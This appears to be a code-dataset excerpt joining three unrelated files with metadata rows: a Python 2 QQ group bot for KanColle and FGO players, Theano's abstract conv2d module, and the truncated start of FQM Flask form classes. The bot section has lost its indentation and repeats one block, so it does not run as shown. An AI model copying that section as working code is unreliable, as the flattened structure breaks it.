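#     with open('shoukaku.log') as log_file:
#         print tail(log_file, lines=5)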
@qqbotslot
def onQQMessage(bot, contact, member, content):
global api
global logger
logger.info(content)
print(contact.qq)
if (contact.qq == '1259276249'):
# content = {'userid':'123456', 'info':content, 'key':TULINGKEY}
# data = json.dumps(content)
# req = urllib2.Request(TULINGURL, data, {'Content-Type': 'application'})
# re = urllib2.urlopen(req)
# re = re.read()
# re_dict = json.loads(re)
# text = re_dict['text']
# bot.SendTo(contact, str(text.encode('utf-8', 'ignore')))
if (content == '-stop'):
bot.SendTo(contact, 'QQ Bot terminated')
bot.Stop()
if (content == '-log output'):
log_file = open('shoukaku.log')
bot.SendTo(contact, tail(log_file, lines = 30))
if('@正规空母翔鹤' in content):
for key, value in responses.iteritems():
print(key)
if key in content:
bot.SendTo(contact, value)
break
return
if('抓取官推' in content):
time_now = datetime.datetime.now()
public_tweets = api.user_timeline('fgoproject')
for tweet in public_tweets:
if(time_now - tweet.created_at < TIME_ONEDAY):
time.sleep(1)
bot.SendTo(contact, str(tweet.text.encode('utf-8', 'ignore')))
return
if('改修' in content):
total_string = ''
print('checking for akashi factory list')
req = urllib2.Request(KCWIKI_DATA)
re = urllib2.urlopen(req)
re = re.read()
equip_list = json.loads(re)
today_week = datetime.datetime.now() + datetime.timedelta(hours = 14)
today_week = (today_week.weekday() + 1) % 7
for equip in equip_list:
list_of_secretary = []
improvements = equip[u'improvement']
#note: one equip can have different combination of secretary and weekdays,
#also different improvement paths
for current_improvement in improvements:
current_requirements = current_improvement[u'req']
for requirement in current_requirements:
days = requirement[u'day']
if(days[today_week]):
#add secretaries to the list
list_of_secretary.extend(requirement[u'secretary'])
if(len(list_of_secretary) > 0):
info = '装备名称: '.encode('utf-8') + equip['name'] + ' 秘书舰: '.encode('utf-8')
for secretary in list_of_secretary:
info = info + secretary + ' '
total_string = total_string + ';' + info
bot.SendTo(contact, total_string)
return
#testgroup '209127315' target 337545621
if (contact.qq == GROUP_NUMBER and '@ME' in content): #info mode
#check the info list
for key, value in responses.iteritems():
if key in content:
bot.SendTo(contact, value)
return
if('攻略' in content or '配置' in content or '带路' in content):
#turn to kcwiki pages
area = ''
if('1-' in content):
area = urllib2.quote('镇守府海域')
if('2-' in content):
area = urllib2.quote('南西群岛海域')
if('3-' in content):
area = urllib2.quote('北方海域')
if('4-' in content):
area = urllib2.quote('西方海域')
if('5-' in content):
area = urllib2.quote('南方海域')
if('6-' in content):
area = urllib2.quote('中部海域')
pattern = regex.compile(r'\d-\d')
subarea = regex.search(pattern, content).group()
print(subarea)
html_content = urllib2.urlopen('https://zh.kcwiki.org/wiki/' + area + '/' + subarea).read()
            soup = BS(html_content, 'html.parser')  # explicit parser avoids a BeautifulSoup warning
print(soup.title)
flag = False
pattern = regex.compile(r'</?\w+[^>]*>|<br\s*?/?>|\n+')
for item in soup.find_all('div'):
if(flag and item.ul is not None):
for entry in item.ul:
time.sleep(1)
bot.SendTo(contact, str(pattern.sub('',str(entry))).encode('utf-8'))
break
if(item.b is not None and '海域情报' in str(item.b)):
print(item.get('class'))
flag = True
return
if('FGO' in content and '情报' in content):
time_now = datetime.datetime.now()
public_tweets = api.user_timeline('fgoproject')
for tweet in public_tweets:
if(time_now - tweet.created_at < TIME_ONEDAY):
time.sleep(1)
bot.SendTo(contact, str(tweet.text.encode('utf-8', 'ignore')))
return
if('舰' in content and '情报' in content):
time_now = datetime.datetime.now()
public_tweets = api.user_timeline('KanColle_STAFF')
for tweet in public_tweets:
if(time_now - tweet.created_at < TIME_ONEDAY):
time.sleep(1)
bot.SendTo(contact, str(tweet.text.encode('utf-8', 'ignore')))
return
        # top-up / payment info (氪金信息)
if('充值' in content or '氪金' in content):
print('check for current price')
bot.SendTo(contact, 'FGO黑卡充值:'.encode('utf-8') + 'https://item.taobao.com/item.htm?spm=0.0.0.0.nBUIej&id=546772277736')
bot.SendTo(contact, 'FGO白卡充值:'.encode('utf-8') + 'https://item.taobao.com/item.htm?spm=a1z0k.7628870.0.0.kayXcs&id=545942439642&_u=p2o03db0b500')
bot.SendTo(contact, '舰娘氪金:'.encode('utf-8') + 'https://item.taobao.com/item.htm?spm=a1z10.5-c.w4002-15864276650.23.yejdE6&id=539141881167')
return
#if no keywords matched, turn to tuling123 api
#the response categories: 100000 = text, 200000 = url, 302000 = news(return type is perhaps a list)
if('改修' in content):
total_string = ''
print('checking for akashi factory list')
req = urllib2.Request(KCWIKI_DATA)
re = urllib2.urlopen(req)
re = re.read()
equip_list = json.loads(re)
today_week = datetime.datetime.now() + datetime.timedelta(hours = 14)
today_week = (today_week.weekday() + 1) % 7
for equip in equip_list:
list_of_secretary = []
improvements = equip[u'improvement']
#note: one equip can have different combination of secretary and weekdays,
#also different improvement paths
for current_improvement in improvements:
current_requirements = current_improvement[u'req']
for requirement in current_requirements:
days = requirement[u'day']
if(days[today_week]):
#add secretaries to the list
list_of_secretary.extend(requirement[u'secretary'])
if(len(list_of_secretary) > 0):
info = '装备名称: '.encode('utf-8') + equip['name'] + ' 秘书舰: '.encode('utf-8')
for secretary in list_of_secretary:
info = info + secretary + ' '
total_string = total_string + ';' + info
bot.SendTo(contact, total_string)
return
pure_content = content.decode('utf8')[6:].encode('utf8')
        print('pure_content = ' + pure_content.decode('utf8').encode('gb2312'))
content = {'userid':member.uin, 'info':pure_content, 'key':TULINGKEY}
data = json.dumps(content)
req = urllib2.Request(TULINGURL, data, {'Content-Type': 'application'})
re = urllib2.urlopen(req)
re = re.read()
re_dict = json.loads(re)
category = re_dict['code']
print(category)
if(category == 100000):
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
elif(category == 200000):
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
link = re_dict['url']
bot.SendTo(contact, str(link.encode('utf-8')))
elif(category == 308000): #the return type is a list
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
return_list = re_dict['list']
print(len(return_list))
counter = 0
for item in return_list:
time.sleep(1)
bot.SendTo(contact, item['name'].encode('utf-8') + '用料: '.encode('utf-8')
+ item['info'].encode('utf-8') + ' 详细做法: '.encode('utf-8') + item['detailurl'].encode('utf-8'))
counter+=1
if(counter > 2):
break
elif(category == 302000):
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
return_list = re_dict['list']
print(len(return_list))
counter = 0
for item in return_list:
time.sleep(1)
bot.SendTo(contact, item['article'].encode('utf-8') + ' 消息来自: '.encode('utf-8')
+ item['source'].encode('utf-8') + ' 详情请见: '.encode('utf-8') + item['detailurl'].encode('utf-8'))
counter+=1
if(counter > 2):
break
else:
#trolling in chat
        #1. message echoing (复读)
        # repetition should be such that, once the bot has joined an echo chain,
        # it should not say anything more until the chain breaks
global repCounter
global prevMsg
curMsg = content
if(repCounter == 0):
repCounter += 1
else:
if(curMsg == prevMsg):
repCounter += 1
print(repCounter)
else:
if(repCounter > 3):
bot.SendTo(contact, '你们的复读坚持了' + str(repCounter + 1) + '次~人类的本质就是个复读机!')
repCounter = 0
if(repCounter == 3):
bot.SendTo(contact, content)
prevMsg = curMsg
@qqbotslot
def onInterval(bot):
    test_group = bot.List('group', GROUP_NUMBER)[0]
# bot.SendTo(test_group, 'interval method evoked')
#execute per 5mins
#sending debug info
time_now = datetime.datetime.time(datetime.datetime.now())
if(time_now >= datetime.time(0,50,0,0) and time_now < datetime.time(0,55,0,0)):
bot.SendTo(test_group, 'Kancolle 演习马上更新, 请各位提督不要忘记演习~'.encode('utf-8'))
if(time_now >= datetime.time(12,50,0,0) and time_now < datetime.time(12,55,0,0)):
bot.SendTo(test_group, 'Kancolle 演习马上更新, 请各位提督不要忘记演习~'.encode('utf-8'))
if(time_now >= datetime.time(6,50,0,0) and time_now < datetime.time(6,55,0,0)):
public_tweets = api.user_timeline('fgoproject')
for tweet in public_tweets:
if(datetime.datetime.now() - tweet.created_at < TIME_ONEDAY):
bot.SendTo(test_group, str(tweet.text.encode('utf-8', 'ignore')))
public_tweets = api.user_timeline('KanColle_STAFF')
for tweet in public_tweets:
            if(datetime.datetime.now() - tweet.created_at < TIME_ONEDAY):  # time_now is a time-of-day, not a datetime
bot.SendTo(test_group, str(tweet.text.encode('utf-8', 'ignore')))
if(time_now >= datetime.time(10,0,0,0) and time_now < datetime.time(10,5,0,0)):
bot.SendTo(test_group, 'FGO日常任务以及免费友情点十连已经更新~'.encode('utf-8'))
if(time_now >= datetime.time(14,0,0,0) and time_now < datetime.time(14,5,0,0)):
bot.SendTo(test_group, 'FGO日常登录奖励大家不要错过哦~'.encode('utf-8'))
if(time_now >= datetime.time(15,0,0,0) and time_now < datetime.time(15,5,0,0)):
bot.SendTo(test_group, 'Kancolle每日任务已经更新~'.encode('utf-8'))
#some time point,
#1am, kancolle drill
#6am, check latest info
#10am, FGO free summoning, daily quest update
#1pm, kancolle drill
#2pm, FGO login award
#3pm, kancolle quest update
@qqbotslot
def onNewContact(bot, contact, owner):
#exec when there is new member joining owner
print('onNewContact evoked')
if(owner is None): return
if(owner.qq == GROUP_NUMBER):
test_group = bot.List('group', GROUP_NUMBER)[0]
new_member = bot.List(test_group, 'qq='+str(contact.qq))[0]
bot.SendTo(owner, '欢迎新dalao~'.encode('utf-8'))
bot.SendTo(owner, 'Hello '.encode('utf-8')+ contact.card.encode('utf-8')+'. 我是翔鹤,有什么问题可以at我,如果对于我的功能有什么建议的话请找nilk.'
.encode('utf-8'))
#open the info table
RunBot(qq='3407757156', user = 'Nilk')
'''
Goal:
1. Nilk will be the only authorized person who has the ability to edit the response of it.
2. Can troll in the group chat
3. When called out by @, provide proper info
'''
'''
TODO:
0. try to trim the @me before msg in group chat(done)
1. song requests, send a url (点歌,发url)
3. top-up / payment info (氪金信息)
4. crawl for info, instead of hard coded csv(done)
5. daily equipment improvements, FGO training grounds and ember quests (今日改修,今日修炼场,今日种火)
6. scheduled reminders to clear dailies and collect login/quest rewards (done)
7. ride the group's "33" meme waves (带33节奏)
KanColle ship info can come from the kcwiki api
'''
| gpl-3.0 | 2,575,763,928,472,989,000 | 30.479714 | 148 | 0.65815 | false | 2.562658 | true | false | false |
cmdunkers/DeeperMind | PythonEnv/lib/python2.7/site-packages/theano/tensor/nnet/abstract_conv2d.py | 1 | 21815 | """
Define abstract conv2d interface
"""
import logging
import theano
from theano.tensor import (as_tensor_variable, patternbroadcast)
from theano.tensor import TensorType
from theano.gof import Apply, Op
from theano.gof import local_optimizer
from theano.tensor.opt import register_specialize_device
# Cpu implementation
from theano.tensor.nnet import conv2d as cpu_conv2d, ConvOp
from theano.tensor.nnet.ConvGrad3D import convGrad3D
from theano.tensor.nnet.ConvTransp3D import convTransp3D
__docformat__ = "restructuredtext en"
_logger = logging.getLogger("theano.tensor.nnet.conv2d")
def conv2d(input,
filters,
input_shape=None,
filter_shape=None,
border_mode='valid',
subsample=(1, 1),
filter_flip=True):
"""
This function will build the symbolic graph for convolving a mini-batch of a
stack of 2D inputs with a set of 2D filters. The implementation is modelled
after Convolutional Neural Networks (CNN).
:type input: symbolic 4D tensor
:param input: mini-batch of feature map stacks, of shape
(batch size, input channels, input rows, input columns).
See the optional parameter ``input_shape``.
:type filters: symbolic 4D tensor
:param filters: set of filters used in CNN layer of shape
(output channels, input channels, filter rows, filter columns).
See the optional parameter ``filter_shape``.
:type input_shape: None, tuple/list of len 4 of int or Constant variable
:param input_shape: The shape of the input parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
:type filter_shape: None, tuple/list of len 4 of int or Constant variable
:param filter_shape: The shape of the filters parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
:type border_mode: str, int or tuple of two int
:param border_mode: Either of the following:
* ``'valid'``: apply filter wherever it completely overlaps with the
input. Generates output of shape: input shape - filter shape + 1
* ``'full'``: apply filter wherever it partly overlaps with the input.
Generates output of shape: input shape + filter shape - 1
* ``'half'``: pad input with a symmetric border of ``filter rows // 2``
rows and ``filter columns // 2`` columns, then perform a valid
convolution. For filters with an odd number of rows and columns, this
leads to the output shape being equal to the input shape.
* ``int``: pad input with a symmetric border of zeros of the given
width, then perform a valid convolution.
* ``(int1, int2)``: pad input with a symmetric border of ``int1`` rows
and ``int2`` columns, then perform a valid convolution.
:type subsample: tuple of len 2
:param subsample: factor by which to subsample the output.
Also called strides elsewhere.
:type filter_flip: bool
:param filter_flip: If ``True``, will flip the filter rows and columns
before sliding them over the input. This operation is normally referred
to as a convolution, and this is the default. If ``False``, the filters
are not flipped and the operation is referred to as a cross-correlation.
:rtype: symbolic 4D tensor
:return: set of feature maps generated by convolutional layer. Tensor is
of shape (batch size, output channels, output rows, output columns)
"""
conv_op = AbstractConv2d(imshp=input_shape,
kshp=filter_shape,
border_mode=border_mode,
subsample=subsample,
filter_flip=filter_flip)
return conv_op(input, filters)
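
# Illustrative usage sketch (not executed at import time). The abstract op
# built below is replaced by a concrete implementation during graph
# optimization:
#
#     import numpy
#     import theano
#     import theano.tensor as T
#
#     x = T.tensor4('x')   # (batch size, channels, rows, columns)
#     w = T.tensor4('w')   # (output channels, input channels, kr, kc)
#     y = conv2d(x, w, border_mode='valid', subsample=(1, 1))
#     f = theano.function([x, w], y)
#     out = f(numpy.random.rand(2, 1, 8, 8).astype('float32'),
#             numpy.random.rand(4, 1, 3, 3).astype('float32'))
#     # out.shape == (2, 4, 6, 6): input shape - filter shape + 1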
class BaseAbstractConv2d(Op):
"""
Base class for AbstractConv
Define an abstract convolution op that will be replaced with the appropriate implementation
:type imshp: None, tuple/list of len 4 of int or Constant variable
:param imshp: The shape of the input parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
imshp is defined w.r.t the forward conv.
:type kshp: None, tuple/list of len 4 of int or Constant variable
:param kshp: The shape of the filters parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
kshp is defined w.r.t the forward conv.
:type border_mode: str, int or tuple of two int
:param border_mode: Either of the following:
* ``'valid'``: apply filter wherever it completely overlaps with the
input. Generates output of shape: input shape - filter shape + 1
* ``'full'``: apply filter wherever it partly overlaps with the input.
Generates output of shape: input shape + filter shape - 1
* ``'half'``: pad input with a symmetric border of ``filter rows // 2``
rows and ``filter columns // 2`` columns, then perform a valid
convolution. For filters with an odd number of rows and columns, this
leads to the output shape being equal to the input shape.
* ``int``: pad input with a symmetric border of zeros of the given
width, then perform a valid convolution.
* ``(int1, int2)``: pad input with a symmetric border of ``int1`` rows
and ``int2`` columns, then perform a valid convolution.
:type subsample: tuple of len 2
:param subsample: factor by which to subsample the output.
Also called strides elsewhere.
:type filter_flip: bool
:param filter_flip: If ``True``, will flip the filter rows and columns
before sliding them over the input. This operation is normally referred
to as a convolution, and this is the default. If ``False``, the filters
are not flipped and the operation is referred to as a cross-correlation.
"""
check_broadcast = False
__props__ = ('border_mode', 'subsample', 'filter_flip', 'imshp', 'kshp')
def __init__(self,
imshp=None, kshp=None,
border_mode="valid", subsample=(1, 1),
filter_flip=True):
if isinstance(border_mode, int):
border_mode = (border_mode, border_mode)
if isinstance(border_mode, tuple):
pad_h, pad_w = map(int, border_mode)
border_mode = (pad_h, pad_w)
if not ((isinstance(border_mode, tuple) and min(border_mode) >= 0) or
border_mode in ('valid', 'full', 'half')):
raise ValueError(
'invalid border_mode {}, which must be either '
'"valid", "full", "half", an integer or a pair of'
' integers'.format(border_mode))
self.imshp = tuple(imshp) if imshp else None
self.kshp = tuple(kshp) if kshp else None
self.border_mode = border_mode
self.filter_flip = filter_flip
if len(subsample) != 2:
raise ValueError("subsample must have two elements")
self.subsample = subsample
def flops(self, inp, outp):
""" Useful with the hack in profilemode to print the MFlops"""
# if the output shape is correct, then this gives the correct
# flops for any direction, sampling, padding, and border mode
inputs, filters = inp
outputs, = outp
assert inputs[1] == filters[1]
# nb mul and add by output pixel
flops = filters[2] * filters[3] * 2
# nb flops by output image
flops *= outputs[2] * outputs[3]
# nb patch multiplied
flops *= inputs[1] * filters[0] * inputs[0]
return flops
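
    # Worked example (illustrative): for inputs (2, 1, 8, 8), filters
    # (4, 1, 3, 3) and outputs (2, 4, 6, 6):
    #   per output pixel:  3 * 3 * 2 = 18 flops
    #   per output image: 18 * 6 * 6 = 648 flops
    #   total:            648 * 1 * 4 * 2 = 5184 flops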
class AbstractConv2d(BaseAbstractConv2d):
"""
Abstract Op for the forward convolution.
"""
def __init__(self,
imshp=None,
kshp=None,
border_mode="valid",
subsample=(1, 1),
filter_flip=True):
super(AbstractConv2d, self).__init__(imshp, kshp,
border_mode, subsample, filter_flip)
def make_node(self, img, kern):
if img.type.ndim != 4:
raise TypeError('img must be 4D tensor')
if kern.type.ndim != 4:
raise TypeError('kern must be 4D tensor')
broadcastable = [img.broadcastable[0],
kern.broadcastable[0],
False, False]
output = img.type.clone(broadcastable=broadcastable)()
return Apply(self, [img, kern], [output])
def perform(self, node, inp, out_):
raise NotImplementedError('AbstractConv2d theano optimization failed')
def grad(self, inp, grads):
bottom, weights = inp
top, = grads
d_bottom = AbstractConv2d_gradInputs(self.imshp, self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(
weights, top, bottom.shape[-2:])
d_weights = AbstractConv2d_gradWeights(self.imshp, self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(
bottom, top, weights.shape[-2:])
return d_bottom, d_weights
class AbstractConv2d_gradWeights(BaseAbstractConv2d):
"""Gradient wrt. filters for `AbstractConv2d`.
:note: You will not want to use this directly, but rely on
Theano's automatic differentiation or graph optimization to
use it as needed.
"""
def __init__(self,
imshp=None,
kshp=None,
border_mode="valid",
subsample=(1, 1),
filter_flip=True):
super(AbstractConv2d_gradWeights, self).__init__(imshp, kshp,
border_mode, subsample, filter_flip)
# Update shape/height_width
def make_node(self, img, topgrad, shape):
if img.type.ndim != 4:
raise TypeError('img must be 4D tensor')
if topgrad.type.ndim != 4:
raise TypeError('topgrad must be 4D tensor')
shape = as_tensor_variable(shape)
broadcastable = [topgrad.broadcastable[1],
img.broadcastable[1],
False, False]
output = img.type.clone(broadcastable=broadcastable)()
return Apply(self, [img, topgrad, shape], [output])
def perform(self, node, inp, out_):
        raise NotImplementedError('AbstractConv2d_gradWeights theano optimization failed')
def grad(self, inp, grads):
bottom, top = inp[:2]
weights, = grads
d_bottom = AbstractConv2d_gradInputs(self.imshp, self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(weights, top, bottom.shape[-2:])
d_top = AbstractConv2d(self.imshp,
self.kshp,
self.border_mode,
self.subsample,
self.filter_flip)(bottom, weights)
d_height_width = (theano.gradient.DisconnectedType()(),)
return (d_bottom, d_top) + d_height_width
def connection_pattern(self, node):
return [[1], [1], [0]] # no connection to height, width
class AbstractConv2d_gradInputs(BaseAbstractConv2d):
"""Gradient wrt. inputs for `AbstractConv2d`.
:note: You will not want to use this directly, but rely on
Theano's automatic differentiation or graph optimization to
use it as needed.
"""
def __init__(self,
imshp=None,
kshp=None,
border_mode="valid",
subsample=(1, 1),
filter_flip=True):
super(AbstractConv2d_gradInputs, self).__init__(imshp, kshp,
border_mode, subsample, filter_flip)
# Update shape/height_width
def make_node(self, kern, topgrad, shape):
if kern.type.ndim != 4:
raise TypeError('kern must be 4D tensor')
if topgrad.type.ndim != 4:
raise TypeError('topgrad must be 4D tensor')
shape = as_tensor_variable(shape)
broadcastable = [topgrad.type.broadcastable[0],
kern.type.broadcastable[1],
False, False]
output = kern.type.clone(broadcastable=broadcastable)()
return Apply(self, [kern, topgrad, shape], [output])
def perform(self, node, inp, out_):
        raise NotImplementedError('AbstractConv2d_gradInputs theano optimization failed')
def grad(self, inp, grads):
weights, top = inp[:2]
bottom, = grads
d_weights = AbstractConv2d_gradWeights(self.imshp, self.kshp,
self.border_mode,
self.subsample)(bottom, top, weights.shape[-2:])
d_top = AbstractConv2d(self.imshp, self.kshp,
self.border_mode, self.subsample)(bottom, weights)
d_height_width = (theano.gradient.DisconnectedType()(),)
return (d_weights, d_top) + d_height_width
def connection_pattern(self, node):
return [[1], [1], [0]] # no connection to height, width
# Cpu Optmization
@local_optimizer([AbstractConv2d])
def local_conv2d_cpu(node):
if not isinstance(node.op, AbstractConv2d):
return None
img, kern = node.inputs
if ((not isinstance(img.type, TensorType) or
not isinstance(kern.type, TensorType))):
return None
if node.op.border_mode not in ['full', 'valid']:
return None
if not node.op.filter_flip:
# Not tested yet
return None
rval = cpu_conv2d(img, kern,
node.op.imshp, node.op.kshp,
border_mode=node.op.border_mode,
subsample=node.op.subsample)
return [rval]
register_specialize_device(local_conv2d_cpu, 'fast_compile')
@local_optimizer([AbstractConv2d_gradWeights])
def local_conv2d_gradweight_cpu(node):
img, topgrad, shape = node.inputs
if ((not isinstance(img.type, TensorType) or
not isinstance(topgrad.type, TensorType))):
return None
if node.op.border_mode not in ['full', 'valid']:
return None
if not node.op.filter_flip:
# Not tested yet
return
if node.op.border_mode == 'valid' and \
(node.op.subsample != (1, 1)):
# Use the gradient as defined in conv3D, because the implementation
# by Conv is slow (about 3x slower than conv3D, and probably 10x
        # slower than it could be), and incorrect when subsample > 2.
# build a "node", that should be equivalent to the one given by
# self.make_node, but using convGrad3D instead.
shuffled_img = img.dimshuffle(0, 2, 3, 'x', 1)
shuffled_topgrad = topgrad.dimshuffle(0, 2, 3, 'x', 1)
rval = convGrad3D(V=shuffled_img,
d=(node.op.subsample[0], node.op.subsample[1], 1),
WShape=(shuffled_topgrad.shape[4],
shape[0], shape[1], 1,
shuffled_img.shape[4]),
dCdH=shuffled_topgrad)
rval = theano.tensor.addbroadcast(rval, 3)
rval = rval.dimshuffle(0, 4, 1, 2)
rval = rval[:, :, ::-1, ::-1]
rval = patternbroadcast(rval, node.outputs[0].broadcastable)
return [rval]
dx, dy = node.op.subsample
if dx not in (1, 2) or dy not in (1, 2):
# Not implemented in the gradient of ConvOp
return None
if node.op.imshp is None:
op_imshp = (None, None, None, None)
else:
op_imshp = node.op.imshp
if node.op.kshp is None:
op_kshp = (None, None, None, None)
else:
op_kshp = node.op.kshp
if None in op_imshp or None in op_kshp:
if (dx, dy) != (1, 1):
# We cannot infer the shapes
return None
# Determine gradient on kernels
assert len(op_imshp) == 4 and len(op_kshp) == 4
outshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], node.op.subsample,
node.op.border_mode)
fulloutshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], (1, 1),
node.op.border_mode)
newimg = img.dimshuffle((1, 0, 2, 3))
newtopgrad = topgrad.dimshuffle((1, 0, 2, 3))
if node.op.border_mode == 'valid':
(img, filters) = (newimg, newtopgrad)
kshp_logical = fulloutshp
kshp_logical_top_aligned = False
imshp_logical = None
(bsize, nkern) = (op_imshp[1], op_kshp[0])
imshp = (op_imshp[0], op_imshp[2], op_imshp[3])
kshp = outshp
elif node.op.border_mode == 'full':
(img, filters) = (newtopgrad, newimg)
kshp_logical = None
kshp_logical_top_aligned = True
imshp_logical = (op_imshp[0],
fulloutshp[0],
fulloutshp[1])
(bsize, nkern) = (op_kshp[0], op_imshp[1])
imshp = (op_imshp[0], outshp[0], outshp[1])
kshp = op_imshp[2:]
else:
raise NotImplementedError(
'Only [full,valid] modes are currently supported.')
# Flip the kernels
filters = filters[:, :, ::-1, ::-1]
dw = ConvOp(imshp, kshp, nkern, bsize, 1, 1, output_mode='valid',
unroll_batch=None, unroll_kern=None, unroll_patch=None,
imshp_logical=imshp_logical,
kshp_logical=kshp_logical,
kshp_logical_top_aligned=kshp_logical_top_aligned,
direction_hint='bprop weights')
res = dw(img, filters)
if node.op.border_mode == 'valid':
res = res.dimshuffle((1, 0, 2, 3))
res = res[:, :, ::-1, ::-1]
res = patternbroadcast(res, node.outputs[0].broadcastable)
return [res]
register_specialize_device(local_conv2d_gradweight_cpu, 'fast_compile')
@local_optimizer([AbstractConv2d_gradInputs])
def local_conv2d_gradinputs_cpu(node):
kern, topgrad, shape = node.inputs
if ((not isinstance(kern.type, TensorType) or
not isinstance(topgrad.type, TensorType))):
return None
if node.op.border_mode not in ['full', 'valid']:
return None
if not node.op.filter_flip:
# Not tested yet
return None
# Conv 3d implementation, needed when subsample > 2
if node.op.border_mode == 'valid' and node.op.subsample != (1, 1):
kern = kern[:, :, ::-1, ::-1]
shuffled_kern = kern.dimshuffle(0, 2, 3, 'x', 1)
shuffled_topgrad = topgrad.dimshuffle(0, 2, 3, 'x', 1)
b = theano.tensor.zeros_like(shuffled_kern[0, 0, 0, 0, :])
rval = convTransp3D(W=shuffled_kern, b=b,
d=(node.op.subsample[0], node.op.subsample[1], 1),
H=shuffled_topgrad,
RShape=(shape[0], shape[1], 1))
rval = theano.tensor.addbroadcast(rval, 3)
rval = rval.dimshuffle(0, 4, 1, 2)
rval = patternbroadcast(rval, node.outputs[0].broadcastable)
return [rval]
# Conv2d Implementation
dx, dy = node.op.subsample
if dx not in (1, 2) or dy not in (1, 2):
# Not implemented in the gradient of ConvOp
return None
if node.op.imshp is None:
op_imshp = (None, None, None, None)
else:
op_imshp = node.op.imshp
if node.op.kshp is None:
op_kshp = (None, None, None, None)
else:
op_kshp = node.op.kshp
if None in op_imshp or None in op_kshp:
if (dx, dy) != (1, 1):
return None
mode = 'valid'
if not node.op.border_mode == 'full':
mode = 'full'
filters = kern.dimshuffle((1, 0, 2, 3))
filters = filters[:, :, ::-1, ::-1]
outshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], node.op.subsample,
node.op.border_mode)
fulloutshp = ConvOp.getOutputShape(op_imshp[2:],
op_kshp[2:], (1, 1),
node.op.border_mode)
nkern = op_imshp[1]
imshp = (op_kshp[0], outshp[0], outshp[1])
imshp_logical = (op_kshp[0], fulloutshp[0], fulloutshp[1])
din = ConvOp(imshp,
op_kshp[2:],
nkern,
op_imshp[0],
1, 1, output_mode=mode,
unroll_batch=None, unroll_kern=None,
unroll_patch=None,
imshp_logical=imshp_logical,
kshp_logical=None,
version=-1,
direction_hint='bprop inputs')
din = din(topgrad, filters)
din = patternbroadcast(din, node.outputs[0].broadcastable)
return [din]
register_specialize_device(local_conv2d_gradinputs_cpu, 'fast_compile')
| bsd-3-clause | -4,049,349,733,614,876,000 | 39.174954 | 95 | 0.576392 | false | 3.936305 | false | false | false |
mrf345/FQM | app/forms/customize.py | 1 | 13933 | import os
from functools import reduce
from wtforms.validators import InputRequired, Length, Optional
from flask_wtf.file import FileAllowed
from wtforms import StringField, SelectField, SubmitField, BooleanField, TextAreaField, FileField
from wtforms_components import TimeField
from app.forms.base import LocalizedForm
from app.forms.constents import (FONT_SIZES, BTN_COLORS, DURATIONS, TOUCH_TEMPLATES, DISPLAY_TEMPLATES,
ANNOUNCEMENT_REPEATS, ANNOUNCEMENT_REPEAT_TYPE, VISUAL_EFFECTS,
VISUAL_EFFECT_REPEATS, BOOLEAN_SELECT_1, TICKET_TYPES,
TICKET_REGISTERED_TYPES, SLIDE_EFFECTS, SLIDE_DURATIONS, EVERY_OPTIONS)
from app.database import Media
from app.constants import SUPPORTED_MEDIA_FILES, SUPPORTED_LANGUAGES, PRINTED_TICKET_SCALES
from app.helpers import get_tts_safely
class TouchScreenForm(LocalizedForm):
touch = SelectField('Select a template for Touch screen :',
coerce=int,
choices=TOUCH_TEMPLATES)
title = StringField('Enter a title :',
validators=[InputRequired('Must enter at least 5 letters and Title '
'should be maximum of 300 letters'),
Length(5, 300)])
hsize = SelectField('Choose title font size :',
coerce=str,
choices=FONT_SIZES)
hcolor = StringField('Select title font color :')
hfont = StringField('choose a font for title :')
hbg = StringField('Select heading background color :')
tsize = SelectField('choose task font size :',
coerce=str,
choices=FONT_SIZES)
tcolor = SelectField('choose tasks color :',
coerce=str,
choices=BTN_COLORS)
tfont = StringField('choose tasks font :')
msize = SelectField('choose message font size :',
coerce=str,
choices=FONT_SIZES)
mcolor = StringField('Select message font color :')
mfont = StringField('Choose message font :')
mduration = SelectField('choose motion effect duration of appearing :',
coerce=str,
choices=DURATIONS)
mbg = StringField('Select message background color :')
message = TextAreaField('Enter a notification message :',
                           validators=[InputRequired('Must enter at least 5 letters and Message '
                                                     'should be maximum of 300 letters'),
Length(5, 300)])
bcolor = StringField('Select a background color : ')
background = SelectField('Select background : ',
coerce=int,
choices=[(0, 'Use color selection')])
naudio = SelectField('Select audio notification : ',
coerce=int,
choices=[(0, 'Disable audio notification')])
submit = SubmitField('Apply')
def __init__(self, *args, **kwargs):
super(TouchScreenForm, self).__init__(*args, **kwargs)
for m in Media.get_all_images():
self.background.choices += [(m.id, f'{m.id}. {m.name}')]
for m in Media.get_all_audios():
self.naudio.choices += [(m.id, f'{m.id}. {m.name}')]
class DisplayScreenForm(LocalizedForm):
display = SelectField('Select a template for Display screen : ',
coerce=int,
choices=DISPLAY_TEMPLATES)
title = StringField('Enter a title : ',
validators=[InputRequired('Title should be maximum of 300 letters'),
Length(0, 300)])
background = SelectField('Select a background : ',
coerce=int,
choices=[(0, 'Use color selection')])
hsize = SelectField('Choose title font size : ',
coerce=str,
choices=FONT_SIZES)
hcolor = StringField('Choose title font color : ')
hfont = StringField('Choose title font : ')
hbg = StringField('Choose title background color : ')
tsize = SelectField('choose main heading office font size :',
coerce=str,
choices=FONT_SIZES)
tcolor = StringField('choose main heading office color : ')
tfont = StringField('choose main heading office font : ')
h2color = StringField('choose main heading ticket color : ')
h2size = SelectField('choose main heading ticket font size :',
coerce=str,
choices=FONT_SIZES)
h2font = StringField('choose main heading ticket font : ')
ssize = SelectField('choose secondary heading font size : ',
coerce=str,
choices=FONT_SIZES)
scolor = StringField('choose secondary heading color : ')
sfont = StringField('choose secondary heading font :')
mduration = SelectField('choose motion effect duration of appearing : ',
coerce=str,
